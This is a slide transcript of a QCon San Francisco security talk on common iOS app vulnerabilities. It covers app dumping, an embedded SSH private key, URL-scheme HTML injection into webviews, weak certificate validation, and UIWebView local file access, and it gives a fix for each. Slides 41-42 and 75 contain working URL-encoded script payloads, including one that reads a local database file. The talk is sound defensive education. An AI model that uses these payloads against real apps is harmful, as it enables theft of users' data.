Video and slides synchronized, mp3 and slide download available at URL https://bit.ly/2xQjjXl. Ivan Rodriguez walks through some of the most common vulnerabilities on iOS apps and shows how to exploit them. All these vulnerabilities have been found on real production apps of companies that have (or don't have) a bug bounty program. This talk is useful for those connected with mobile app development or those who do use mobile apps to work with sensitive data. Filmed at qconsf.com. Ivan Rodriguez is a Software Engineer at Google by day and a security researcher at night. He has found many vulnerabilities on different mobile applications and reported them through the popular bug bounty platforms HackerOne and Bugcrowd. He worked for many years as a mobile developer before changing his career and focusing on application security.

1. CommonVulnerabilities on iOS Apps
by ivan r
QconSF
@ivRodriguezCA

2. InfoQ.com: News & Community Site
• Over 1,000,000 software developers, architects and CTOs read the site world-
wide every month
• 250,000 senior developers subscribe to our weekly newsletter
• Published in 4 languages (English, Chinese, Japanese and Brazilian
Portuguese)
• Post content from our QCon conferences
• 2 dedicated podcast channels: The InfoQ Podcast, with a focus on
Architecture and The Engineering Culture Podcast, with a focus on building
• 96 deep dives on innovative topics packed as downloadable emags and
minibooks
• Over 40 new content items per week
Watch the video with slide
synchronization on InfoQ.com!
https://www.infoq.com/presentations/
exploiting-ios-vulnerabilities/

3. Purpose of QCon
- to empower software development by facilitating the spread of
knowledge and innovation
Strategy
- practitioner-driven conference designed for YOU: influencers of
change and innovation in your teams
- speakers and topics driving the evolution and innovation
- connecting and catalyzing the influencers and innovators
Highlights
- attended by more than 12,000 delegates since 2007
- held in 9 cities worldwide
Presented at QCon San Francisco
www.qconsf.com

4. @ivRodriguezCA

5. DISCLAIMER
the views and opinions expressed on this talk are
solely my own and do not reflect the views or
opinions of my employer.
@ivRodriguezCA

6. ivan_rodriguez.me
• security researcher and software engineer
• focused on iOS reverse engineering and mobile bug bounty programs
• i blog at ivrodriguez.com
• find me on twitter: @ivRodriguezCA
• find me on github: /ivRodriguezCA
@ivRodriguezCA

7. agenda
• reverse engineering an iOS app.
• tools and methods.
• common iOS vulnerabilities (all found on real world applications).
• how to fix and prevent these vulnerabilities.
• resources / conclusions.
• questions.
@ivRodriguezCA

8. reverse engineering an iOS app
• iOS apps are encrypted with an algorithm called FairPlay.
• we need a jailbroken device.
• we don’t “decrypt” the apps, we just dump them from memory.
• transfer them to a desktop where we do the reverse engineering.
@ivRodriguezCA

9. reverse engineering an iOS app
• how we dump the app from memory?
> dump memory <filename> <start_address> <end_address>
@ivRodriguezCA

10. reverse engineering an iOS app
• how we dump the app from memory?
> dump memory <filename> <start_address> <end_address>
• we can use tools to automate this.
@ivRodriguezCA

11. reverse engineering an iOS app
• some of the tools we can use:
- dumpdecrypted: https://github.com/stefanesser/dumpdecrypted
- bfinject: https://github.com/BishopFox/bfinject
- frida-ios-dump: https://github.com/AloneMonkey/frida-ios-dump
@ivRodriguezCA

12. reverse engineering an iOS app
@ivRodriguezCA

13. reverse engineering an iOS app
@ivRodriguezCA

14. reverse engineering an iOS app
@ivRodriguezCA

15. reverse engineering an iOS app
• dynamic and static analysis
@ivRodriguezCA

16. reverse engineering an iOS app
• dynamic and static analysis
@ivRodriguezCA

17. reverse engineering an iOS app
• dynamic and static analysis
@ivRodriguezCA

18. vulnerability # 1
• searching through embedded files within the app
@ivRodriguezCA

19. vulnerability # 1
@ivRodriguezCA

20. vulnerability # 1
private_key
@ivRodriguezCA

21. vulnerability # 1
private_key
yes, PRIVATE key
@ivRodriguezCA

22. vulnerability # 1
cloud server
@ivRodriguezCA

23. vulnerability # 1
cloud server
@ivRodriguezCA

24. vulnerability # 1
cloud server
@ivRodriguezCA

25. vulnerability # 1
cloud server
ssh
@ivRodriguezCA

26. vulnerability # 1
cloud server
ssh
!
@ivRodriguezCA

27. how to fix vulnerability # 1
cloud server own server
@ivRodriguezCA

28. how to fix vulnerability # 1
cloud server own server
@ivRodriguezCA

29. how to fix vulnerability # 1
cloud server own server
@ivRodriguezCA

30. how to fix vulnerability # 1
cloud server own server
@ivRodriguezCA

31. how to fix vulnerability # 1
cloud server own server
public api
@ivRodriguezCA

32. how to fix vulnerability # 1
cloud server own server
ssh
@ivRodriguezCA

33. how to fix vulnerability # 1
cloud server own server
ssh
@ivRodriguezCA

34. vulnerability # 2
@ivRodriguezCA

35. vulnerability # 2
@ivRodriguezCA

36. vulnerability # 2
@ivRodriguezCA

37. vulnerability # 2
@ivRodriguezCA

38. vulnerability # 2
@ivRodriguezCA

39. @ivRodriguezCA

40. vulnerability # 2
• coinza://news/<trusted-html>
@ivRodriguezCA

41. vulnerability # 2
• coinza://news/<trusted-html>
- <html><body><script>document.location = ‘https://en.wikipedia.org/
wiki/URL_redirection’;</script></body></html>
•
@ivRodriguezCA

42. vulnerability # 2
• coinza://news/<trusted-html>
- <html><body><script>document.location = ‘https://en.wikipedia.org/
wiki/URL_redirection’;</script></body></html>
coinza://news/
%3Chtml%3E%3Cbody%3E%3Cscript%3Edocument.location%20%3D%20%
27https%3A%2F%2Fen.wikipedia.org%2Fwiki%2FURL_redirection%27%3B%
3C%2Fscript%3E%3C%2Fbody%3E%3C%2Fhtml%3E
@ivRodriguezCA

43. how to fix vulnerability # 2
@ivRodriguezCA

44. how to fix vulnerability # 2
!
@ivRodriguezCA

45. how to fix vulnerability # 2
• URL Schemes + WebViews are dangerous and you should be careful
when you pair them.
• don’t load HTML code from user-controlled content.
• if you need to dynamically react to URL Schemes have a set of
whitelisted actions.
@ivRodriguezCA

46. @ivRodriguezCA
vulnerability # 3

47. @ivRodriguezCA
vulnerability # 3

48. vulnerability # 3
@ivRodriguezCA

49. vulnerability # 3
@ivRodriguezCA

50. vulnerability # 3
@ivRodriguezCA

51. vulnerability # 3
== ?
@ivRodriguezCA

52. vulnerability # 3
✅
@ivRodriguezCA

53. vulnerability # 3
🛑
@ivRodriguezCA

54. vulnerability # 3
🛑
🚫
@ivRodriguezCA

55. vulnerability # 3
🛑
✅
@ivRodriguezCA

56. vulnerability # 3
🛑
website.com
@ivRodriguezCA

57. vulnerability # 3
🛑
username/password
@ivRodriguezCA

58. vulnerability # 3
🛑
@ivRodriguezCA

59. @ivRodriguezCA

60. vulnerability # 3
@ivRodriguezCA

61. vulnerability # 3
detected connection
to a website
@ivRodriguezCA

62. vulnerability # 3
creates fakeTLS
certificate
@ivRodriguezCA

63. vulnerability # 3
sniffs client traffic
@ivRodriguezCA

64. how to fix vulnerability # 3
• vet and test your 3rd party frameworks, specially if they handle your
network requests.
• be careful when implementing your own certificate validation logic.
• if you want to implement HPKP you can useTrustKit:
- https://github.com/datatheorem/TrustKit
@ivRodriguezCA

65. how to fix vulnerability # 3
@ivRodriguezCA
source: https://cheatsheetseries.owasp.org/cheatsheets/Pinning_Cheat_Sheet.html

66. vulnerability # 4
@ivRodriguezCA

67. vulnerability # 4
@ivRodriguezCA

68. vulnerability # 4
@ivRodriguezCA

69. vulnerability # 4
@ivRodriguezCA

70. vulnerability # 4
@ivRodriguezCA

71. vulnerability # 4
• these methods are equivalent for local files
@ivRodriguezCA

72. vulnerability # 4
@ivRodriguezCA

73. vulnerability # 4
file: sqlcipher.db
path: Documents/
@ivRodriguezCA

74. vulnerability # 4
send file to a
remote location.
@ivRodriguezCA

75. vulnerability # 4
• coinza://news/
%3Chtml%3E%0A%20%20%20%3Cbody%3E%0A%20%20%20%20%20%20%3Cscript%3E%0A%20%20%20%20%20%20%20%20%20function%20loa
dFile%28%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20var%20xmlhttp%20%3D%20new%20XMLHttpRequest%28%29%3B%0
A%20%20%20%20%20%20%20%20%20%20%20%20documentsPath%20%3D%20document.URL.split%28%27%2F%27%29.slice%280%2C%20-1%29.j
oin%28%27%2F%27%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20filePath%20%3D%20documentsPath%20%2B%20%27%2F%27%
20%2B%20%27sqlcipher.db%27%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20xmlhttp.onreadystatechange%20%3D%20function%28%2
9%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28xmlhttp.readyState%20%3D%3D%204%29%20%7B%0A%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28xmlhttp.responseText.length%20%3E%200%29%20%7B%0A%20%2
0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20alert%28%27Got%20file%20%5C%27sqlcipher.db%5C%27%2C%20size
%3A%20%27%20%2B%20xmlhttp.responseText.length%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7
D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%3B%0A%2
0%20%20%20%20%20%20%20%20%20%20%20xmlhttp.onerror%20%3D%20function%28%29%20%7B%0A%20%20%20%20%20%20%20%20%20%2
0%20%20%20%20%20alert%28%27Error%21%20%27%20%2B%20filePath%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A
%20%20%20%20%20%20%20%20%20%20%20%20xmlhttp.open%28%27GET%27%2C%20filePath%2C%20true%29%3B%0A%20%20%20%20%20%2
0%20%20%20%20%20%20xmlhttp.send%28%29%3B%0A%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%20wind
ow.onload%20%3D%20loadFile%3B%0A%20%20%20%20%20%20%3C%2Fscript%3E%0A%20%20%20%20%20%20%3Cp%3E%0A%20%20%20%20%
20%20%20%20%20Hello%20World%0A%20%20%20%20%20%20%3C%2Fp%3E%0A%20%20%20%3C%2Fbody%3E%0A%3C%2Fhtml%3E
@ivRodriguezCA

76. @ivRodriguezCA

77. how to fix vulnerability # 4
• do not use UIWebView anymore, use WKWebView instead.
• if you absolutely have to use UIWebView:
- do not use - (void)loadRequest:(NSURLRequest *)request for local files.
- Use - (void)loadHTMLString:(NSString *)string baseURL:(NSURL *)baseURL with an URL
object created with [URLWithString:@“about:blank”].
-
@ivRodriguezCA

78. conclusions
• add security assessments to your release cycles.
• keep your 3rd party libraries up to date.
• be careful copy-pasting code from online sources.
• have a public bounty program or at least public channels for
responsible disclosures.
@ivRodriguezCA

79. resources
• OWASP - Mobile Application SecurityVerification Standard
https://github.com/OWASP/owasp-masvs
• OWASP -The Mobile SecurityTesting Guide
https://github.com/OWASP/owasp-mstg
• Resources Page of my course
https://github.com/ivRodriguezCA/RE-iOS-Apps/blob/master/
Resources.md
@ivRodriguezCA

80. resources
• for a more detailed guide visit:
https://github.com/ivRodriguezCA/RE-iOS-Apps
@ivRodriguezCA

81. @ivRodriguezCA

82. @ivRodriguezCA

83. questions?
@ivRodriguezCA

84. thank you!
@ivRodriguezCA

85. Watch the video with slide
synchronization on InfoQ.com!
https://www.infoq.com/presentations/
exploiting-ios-vulnerabilities/